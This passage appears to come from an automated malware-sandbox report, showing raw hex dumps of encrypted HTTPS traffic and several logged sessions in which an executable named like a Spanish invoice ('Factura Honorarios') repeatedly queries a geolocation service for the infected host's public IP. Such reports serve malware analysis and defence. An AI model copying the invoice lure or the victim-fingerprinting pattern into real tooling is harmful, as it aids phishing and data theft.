                                                                                                                                2024-11-18 12:50:50 UTC4915INData Raw: c6 13 ea e7 6e b6 8b dd bd 11 c8 ab 65 e3 90 c5 2d 42 01 76 c7 c9 2f 7e fc a5 a7 8e c5 11 5a 63 88 52 13 39 ac 72 23 4d f8 12 33 16 8f 91 c1 3e ce fb b1 b8 b0 d0 54 39 08 2e 8c e7 f0 2a a2 26 8d 23 54 3c dc 54 a5 6b 0e 4f b7 9a 87 0d 5d a2 1d 88 72 18 57 73 11 68 ce 99 2e 7f 55 78 97 58 b8 7a 86 71 20 b6 73 c5 7d 1c f3 45 f5 02 56 8f a8 17 93 7b d8 31 5c cb 63 41 bb d0 b2 48 0b ac 3d 4b 2e c8 54 5a 19 68 cf 20 8d d6 a5 be d4 5d 02 4e ff 50 60 f0 ba 0e 1d e3 86 11 89 7f c7 d5 5e 9a 57 ee eb 4e c7 05 d5 7b 60 69 61 4c 3c 77 79 15 7c a4 04 8f 1e ea 80 1c 88 1b bd 5b e2 f0 9c 84 34 62 43 da e7 ab 81 25 fb 42 18 b7 d2 03 a5 0b 6b f4 91 28 b5 30 15 03 6c 83 1a 53 eb f1 f8 09 c0 3c 7c 0a 25 71 e3 75 2b 6c 7d f3 e9 04 6a 50 15 b3 30 f9 b8 34 b3 c2 32 2c 40 b7 10
                                                                                                                                Data Ascii: ne-Bv/~ZcR9r#M3>T9.*&#T<TkO]rWsh.UxXzq s}EV{1\cAH=K.TZh ]NP`^WN{`iaL<wy|[4bC%Bk(0lS<|%qu+l}jP042,@
                                                                                                                                2024-11-18 12:50:50 UTC4867INData Raw: 4b aa 33 22 51 44 95 4e ac cf 2f ef 14 38 07 ae a4 31 15 bc 3c 21 a7 e6 ec d6 0d 1c 48 d1 15 30 e0 08 1d da 9a 2d a3 9a 7d d9 68 f1 94 ea ab db 98 a6 cc f6 38 d2 d1 b8 9b 9d de 5d 17 0d 34 cb b1 d2 61 12 f7 7f a7 29 e1 5e 00 c2 31 11 eb 9d 9e c3 9f 22 cc 81 9a 00 25 f2 ea e7 21 09 b5 64 45 b0 8b b9 20 39 77 7d 21 75 b5 d9 b5 3e 35 67 71 42 f5 76 5b 3e d6 9c 6e 4f 5f 43 59 7e e5 0f 90 48 a6 b5 bb 52 2b 26 df ac c9 3e 53 42 f5 86 39 69 c2 cd 5f fb b2 59 cf d4 7f d7 17 5e 9f 03 96 ee db 61 87 b4 61 b4 5d 53 b3 be fa ac da 18 24 54 22 ff e9 58 2a 1a 79 ba 0a c1 df ef 6a a0 fb 50 f4 92 19 f0 38 e8 63 20 f5 e8 c3 c7 d6 73 17 7c 0c f6 56 7c 20 94 77 cd fa e7 84 66 0e 94 1f aa fd 92 51 71 b5 f8 fc 93 11 db 35 c7 17 03 ff 29 2a 50 3d 06 53 fd 7b c1 79 c4 36 df 88
                                                                                                                                Data Ascii: K3"QDN/81<!H0-}h8]4a)^1"%!dE 9w}!u>5gqBv[>nO_CY~HR+&>SB9i_Y^aa]S$T"X*yjP8c s|V| wfQq5)*P=S{y6
                                                                                                                                2024-11-18 12:50:50 UTC1324INData Raw: 5d cc 5d 32 25 53 7d 41 e2 16 25 39 24 3b da 2f 45 e8 c9 69 7d b9 5a bd ab 18 39 56 73 c9 2b fa e6 d9 ba 94 7e a4 be 9d 18 3c cb ff be e7 71 ab eb 04 d2 1f 89 61 9d a2 14 d2 c0 06 44 00 b1 cb 3b 29 71 f8 95 f1 30 de ac 54 f9 3b 39 20 06 d3 ea 03 03 ae a7 0e ec fa c3 c5 a9 b8 7f 34 29 a1 8d af 23 ee 14 ee 28 fb f6 f4 fe 5d c1 6f 24 28 fb 04 db 30 f7 61 1e ad c6 a0 88 dd c8 b5 b5 63 d7 39 3d d0 75 81 57 5d b6 7b be 37 4d 77 a7 74 89 5c fd f2 ed bd aa 36 83 25 22 e7 50 d5 80 b1 4d df 29 e5 7c a3 f9 1b fb 20 1c 52 23 9a a5 95 94 79 1b 75 ff ab 19 3d 62 cf 3b dd 8f f7 ed 5a b3 f8 b6 3f 4c 97 3f 95 d3 40 54 f2 41 bc 29 d8 ca 56 fd ae 93 27 b3 ab 4a 2c 03 dd ef 22 d5 28 e3 4d 97 10 a8 4e c9 58 a8 24 ab 39 31 52 3a 78 90 bc ee 75 4e 16 38 7d ab 83 b0 3d de 36 37
                                                                                                                                Data Ascii: ]]2%S}A%9$;/Ei}Z9Vs+~<qaD;)q0T;9 4)#(]o$(0ac9=uW]{7Mwt\6%"PM)| R#yu=b;Z?L?@TA)V'J,"(MNX$91R:xuN8}=67
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: 37 3b 36 2e 66 8c af 8f c7 d9 74 11 0f a5 45 9f 31 68 86 ab 82 f0 da 0e 7b cb 88 40 2f 0c a3 3b e4 18 d0 87 1d e4 ef 69 9e 8f ca f8 3f 5a 12 2f 87 5c 81 d0 e4 47 ad f6 e5 fc 21 25 74 a9 62 85 39 da 15 e5 7c 39 bf c6 da 2a e9 d7 ef 86 73 d7 43 b7 41 6d f3 08 20 2b 1b 1c 62 7c 52 9f 74 83 37 98 d7 f7 c5 9b 24 8b 48 0d 8f 25 d5 81 9e 48 8f 04 c2 0a d3 5b 34 ec 28 a8 5e 23 90 2f c7 8c 0b 44 7a ff a5 84 18 7b b5 12 fc fd fc 5c 7f d9 f4 d0 30 4c e3 b5 f9 c8 3e 74 e3 63 c6 cb fd d6 20 52 9f 93 57 17 83 e1 3c 26 ff b4 ea d5 22 fa 6e e9 04 ca 4e cd 21 bf 24 ab 33 22 25 73 49 90 b8 98 92 d9 14 48 1b 95 2a 31 3d d4 2a df ac 2b c8 c7 03 30 14 8d d4 70 e0 0a 1c ff 8c 05 98 95 7d 9e cb d4 83 53 1e db 98 a2 6e d3 20 a0 84 b7 9b ef 7c 78 0e de 0d cb b1 cd c3 37 ed c5 df
                                                                                                                                Data Ascii: 7;6.ftE1h{@/;i?Z/\G!%tb9|9*sCAm +b|Rt7$H%H[4(^#/Dz{\0L>tc RW<&"nN!$3"%sIH*1=*+0p}Sn |x7
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: 8f 9a 8a bd 22 3e 91 94 2b 0f 3a 9f 7c d3 51 51 24 08 a8 58 23 ee 2c b0 8c 0f 3d 97 ff db b1 0b 7c a0 05 b2 5e f3 4f 75 b8 8d a0 e3 4c e7 97 b0 b6 02 7e f2 45 cb 42 fd d6 2e 69 a9 ed 66 11 83 3b 5e 96 d5 80 9a c3 00 68 4d e9 26 be b0 cc 38 68 35 a2 1f 2e 4a 4c 5e ff 76 ea 07 d1 14 38 26 b6 ab 20 35 c8 53 eb ad 38 e6 d6 27 0d 40 ee 67 30 e0 0e 35 11 9a 77 a9 f5 b1 ee 69 fb 94 6a a2 a5 a2 a8 cc f2 46 e9 d1 b8 9f ec 62 5d 17 aa 5a 06 b1 c9 6b 12 e6 bf b7 2f 8e 9e 00 c2 3b 11 fa 9b f1 0c 9f 22 c6 80 b2 64 25 25 ed e7 ff c1 91 4c 71 a0 8b b3 33 76 77 55 42 6e 85 d0 6b 8f 35 67 71 2f c0 76 4a 3a a4 21 0f 4f 2f 5f 7a f8 cd 55 9a 5e 52 b7 c7 05 3a 2d ec 08 ac 3e 53 36 de 81 26 7d 67 79 5f fb b9 25 a6 aa 49 dd 17 5d ea 73 e1 ee ab 7d a8 5a 06 b4 57 4f 22 d7 e9 a1
                                                                                                                                Data Ascii: ">+:|QQ$X#,=|^OuL~EB.if;^hM&8h5.JL^v8& 5S8'@g05wijFb]Zk/;"d%%Lq3vwUBnk5gq/vJ:!O/_zU^R:->S6&}gy_%I]s}ZWO"
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: a4 38 28 d1 27 1c 68 90 59 21 e0 74 01 da 9a 73 cc 74 7d ee 63 83 ce 7a aa ab 8e 80 4d f6 38 d8 c7 46 98 95 d8 64 b5 a7 35 cb cf fa 61 12 f3 c5 33 2b e1 20 16 ea b0 11 eb 97 88 3d 9e 29 cb b9 be 01 25 25 ff 37 74 d1 b4 65 6d 8d 8b b9 2a 0e 6e 6d 20 1e 92 57 b6 8f 35 66 54 47 8b 32 4a 3e d2 9c 09 4f 5f 4f 3d c0 cd 55 9a 3a b9 a3 d4 7e 03 7d d5 c3 a7 40 18 48 f5 85 0e 33 4f 92 55 85 ac 36 aa d0 57 97 17 59 92 ce e4 fa cf 43 3a db 06 be 29 da dc d6 fb a0 d0 1c 56 70 5b ff 99 3d 82 1e 79 a1 0e c1 b6 de 00 a0 ff 24 a4 97 19 e5 4e 27 08 20 ff 8d 6d c1 c7 7f 15 3b 3a f6 56 7c 3d c7 39 cd eb e0 8d 78 6d 9b 65 ab 8d 30 7e 66 41 5d f8 fc 76 79 10 d5 68 88 fe 29 4b f7 34 17 3c c0 14 c0 7d 66 19 c5 26 dc 64 0a 3f 15 bf 63 8c 41 a2 a5 8c 1d f6 57 73 1b ca ab 85 5c 4a
                                                                                                                                Data Ascii: 8('hY!tst}czM8Fd5a3+ =)%%7tem*nm W5fTG2J>O_O=U:~}@H3OU6WYC:)Vp[=y$N' m;:V|=9xme0~fA]vyh)K4<}f&d?cAWs\J
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: 68 d6 3a e9 48 ac bc c7 14 3a 3c a6 6a ad 3e 59 5b e9 90 3a 16 34 92 5f f1 a0 2b bb c8 10 76 17 59 92 6c e1 f4 b4 c1 80 db 0c b4 4c 42 b3 0d fa ac da 14 24 1f 88 ff e9 52 39 1e 6f 83 78 c9 c8 96 00 80 fb 56 e7 97 31 96 3d 9b 02 20 e9 6f 90 c1 c7 74 30 05 12 62 5d 76 50 62 38 cd eb e7 0a 4b 08 ec 35 ab fd 96 f9 54 71 9b 21 ed 7c ab 1d 8d 1a dd f7 8b 1e 4c 6f 48 42 f8 10 62 5c de 4e da 46 a5 1b a8 6a ac 81 f5 b2 5d a2 a4 ad 64 6a d0 63 11 18 2c bc 39 57 e1 78 97 52 1a 5f 9e 03 5f a3 73 b5 df 39 ea 6d 41 02 56 85 0a 32 89 09 b9 23 5c bb c1 69 ce d0 32 42 a9 84 46 54 94 cc 47 f0 62 62 fb 98 fc e4 77 9f 80 31 43 74 df 20 18 ed 68 6e 7c fe 8e 30 e8 11 af ab 34 ab 21 a3 8f 3c b2 6d f5 cf 8f 48 25 03 4a 7f 20 7a 18 cb 39 9d 13 c8 c6 1c 88 11 63 5b e2 f0 cc c1 4a
                                                                                                                                Data Ascii: h:H:<j>Y[:4_+vYlLB$R9oxV1= ot0b]vPb8K5Tq!|LoHBb\NFj]djc,9WxR__s9mAV2#\i2BFTGbbw1Ct hn|04!<mH%J z9c[J
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: d5 18 03 86 46 fc 7c d1 35 cd 1d b2 4e 29 3b 5f 1c 07 4a ee 1c 4e 10 ab 62 df 54 af 6b 03 20 1d 9a 78 f8 5d 7c a9 88 7b 34 50 7a 7e 69 8e 99 24 7f 89 a6 84 7d 90 4e 86 71 2a a5 77 c5 55 7e f3 45 ff df 35 89 a8 17 93 7b d8 4f 6e cb 63 45 c9 45 30 48 7b ba 1b d5 94 c6 5e f8 ee a4 fd 9d 9d 9f 51 55 82 35 6b 43 f0 20 12 9b af 1d 6c 8e d6 64 c0 90 a9 ba 20 ac cb 8a d8 3a a3 6d cc 22 0f 49 25 03 7b a9 12 47 18 c1 2c f1 d3 e0 a4 16 a0 da bd 5b e8 f0 bf 03 34 62 05 c8 e3 ba 5f de 51 24 18 b3 a1 c0 a5 0b 61 9b b5 28 b7 3b 1e 13 3b ec df 4f ef fb 86 20 c0 3c 78 65 e3 71 0d 44 2f 7d 7a a1 6e 14 6a 60 39 07 30 f9 f2 46 2e f2 32 5c 68 ee 10 84 12 c6 10 4e b6 45 c5 e5 c2 b5 1a ed 0a 55 e9 c8 25 2d 27 49 2b 7a 26 66 41 18 3a 5a 4f c3 6f b3 2d 51 8d 7f e7 08 93 54 12 6c
                                                                                                                                Data Ascii: F|5N);_JNbTk x]|{4Pz~i$}Nq*wU~E5{OncEE0H{^QU5kC ld :m"I%{G,[4b_Q$a(;;O <xeqD/}znj`90F.2\hNEU%-'I+z&fA:ZOo-QTl
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: df 20 12 b7 87 7c 7c 84 bb ff a8 11 a9 bb 0f ac 47 a2 dd 3c c2 c9 d0 05 26 fd 25 03 65 f5 31 62 6a 94 25 82 63 42 81 05 f6 23 bd 5b e6 52 e9 db 46 53 0c db 94 09 7d bb 15 04 18 b7 d6 a1 80 17 19 c1 67 28 c7 93 36 77 3c 83 10 20 b3 f1 f8 17 d3 1e 67 87 65 71 0d 4f 0a 7a 0f 94 fe 04 1a b2 34 a4 18 4d f8 34 b9 40 17 34 32 e0 1f 84 68 0b f2 57 c8 77 c5 f4 c1 0a b2 b7 78 64 eb ed 43 fd 26 2a 2b 0a 8e 50 75 26 a6 2c 4f c9 c7 96 15 23 d4 70 e7 50 46 71 0b 18 7e e5 e8 9e ec f1 e2 39 6b 37 e2 ec fb 54 6b b7 70 93 2d cc a4 48 f4 7b f2 fa 10 cf 66 55 24 c0 0b 0e 90 6a d5 6e b3 37 d2 a0 5b 2f c3 32 1d 13 34 57 d3 d6 08 31 7e 42 75 af 92 f5 f0 92 7c fa 21 f9 da 7f 9e aa 00 66 72 4b e9 35 ff c2 09 bc 92 7a 0b 34 16 4c d7 30 72 f0 f3 ea 32 f9 31 31 2a d2 af 8e f7 4f 71
                                                                                                                                Data Ascii: ||G<&%e1bj%cB#[RFS}g(6w< geqOz4M4@42hWwxdC&*+Pu&,O#pPFq~9k7Tkp-H{fU$jn7[/24W1~Bu|!frK5z4L0r211*Oq
                                                                                                                                2024-11-18 12:50:50 UTC1378INData Raw: f3 22 5e a9 a3 10 f4 66 b6 d7 4e b2 67 8c f4 c5 a2 e5 a4 1b 55 98 9e e1 5f 0e 55 44 d9 84 43 5c 30 f0 66 4f c9 c9 e5 fc 23 d8 7a f4 69 4f 40 0b 12 7a 97 03 a3 ec 81 f0 00 c8 45 85 f1 ed da 14 bb 62 82 3b c8 e1 59 e5 66 8c 13 6e 8f 6c 55 20 c3 3e 0e 81 7d c3 df 69 12 fa 9e 5b 2f d8 30 47 2d 1c 35 d7 fe c9 ef 7e 48 1a 63 ec c2 fa 92 69 99 ca c1 da 0f 8c fc ba 66 72 45 8c 77 fe d1 26 c2 7a 56 57 23 9b 1d c6 21 7f ba 2b 98 1b e5 31 50 84 98 77 a6 43 45 71 6a 73 63 6d 95 e4 56 08 6a 05 ab 40 8c d0 61 ee 88 fa 72 69 5a ff 37 cf 58 26 0c fd ab ed 40 96 66 40 21 25 eb 7f 33 f9 a1 54 ff 7f 24 f1 35 e1 28 a1 6c 01 f0 66 79 1d 18 a4 b4 f8 f0 21 f4 8f a1 f2 53 bb 9f 04 62 22 9d 6d 2d 48 fb e7 bc c0 23 c7 ec a3 45 b6 83 fe 4b 12 67 8f e0 1a c6 52 02 bc 79 dc 0b 19 49
                                                                                                                                Data Ascii: "^fNgU_UDC\0fO#ziO@zEb;YfnlU >}i[/0G-5~HcifrEw&zVW#!+1PwCEqjscmVj@ariZ7X&@f@!%3T$5(lfy!Sb"m-H#EKgRyI


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.849714188.114.97.34437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:50:56 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-18 12:50:56 UTC860INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:50:56 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35739
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxW9tW9SpCIlLnPTs0m6hQShTPiUBJbB2ky5H5TGdsn2f1zHc5RtKcNz8ngsbm%2FzmSq3OrTevK9PkW2JOxiLN%2BpUvsDhdCBjd33NAzM8%2F63zQ%2B%2B%2FdVJFmDuQpkOEi%2B9ZVpK2J%2BK9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e4816d148062cde-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1171&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2415346&cwnd=248&unsent_bytes=0&cid=66ef86e74a2ba8ee&ts=177&x=0"
                                                                                                                                2024-11-18 12:50:56 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.849715188.114.97.34437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:50:59 UTC63OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                2024-11-18 12:50:59 UTC848INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:50:59 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35742
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOgaV5QkXp%2FfdYWdVcXZL8LJEZskAUN4WOqrUVW9NjtHj8nhdwHrES5Qw3d4a4SFktIBVrULLFTfbI%2B1IHWggI4Nt0x2XWKRVTyZX2QsOT9ZZBDACyfuslrkU5i889AKknc5oCTM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e4816e45ae52cc3-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1391&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2039436&cwnd=251&unsent_bytes=0&cid=2b424b4d2dfb59d6&ts=175&x=0"
                                                                                                                                2024-11-18 12:50:59 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.849717188.114.97.34437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:51:01 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-18 12:51:01 UTC848INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:01 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35744
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=elHLwBlSM%2Ba3xRn48ac5MgP87hoTA3jymrvw3J4i9mcUQAwouQNRatr7dzDZpLz8Jo9G7VE20tQ8XX1wwEpkJQ0f6PzyrBj3zZt6mrK%2FywIrBjKxBtgtzzSTXc1PFSnCHKAK1qzZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e4816ee5bf44794-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1317&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1848117&cwnd=251&unsent_bytes=0&cid=8b0d774f2d9899f4&ts=150&x=0"
                                                                                                                                2024-11-18 12:51:01 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.849719188.114.97.34437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:51:03 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-18 12:51:03 UTC852INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:03 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35746
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hf8YU3IqrQfci%2BMoncWnMGp3VS0NcWIDxBK77%2BKDNEVFG4d3ru8yll6sTyKmPg08gLhnhFNh1jeGCVhdcypC4mU216HFHxxb%2FVqqa2wQCanxHNuvUZJqKlJywit1ws5CwHM%2FskxZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e4816f85fb4e556-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1104&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2170914&cwnd=251&unsent_bytes=0&cid=95a455ed45cd1e27&ts=145&x=0"
                                                                                                                                2024-11-18 12:51:03 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                                                Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.849721188.114.97.34437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:51:05 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-18 12:51:05 UTC854INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:05 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 358
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 35748
                                                                                                                                Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                                                Accept-Ranges: bytes
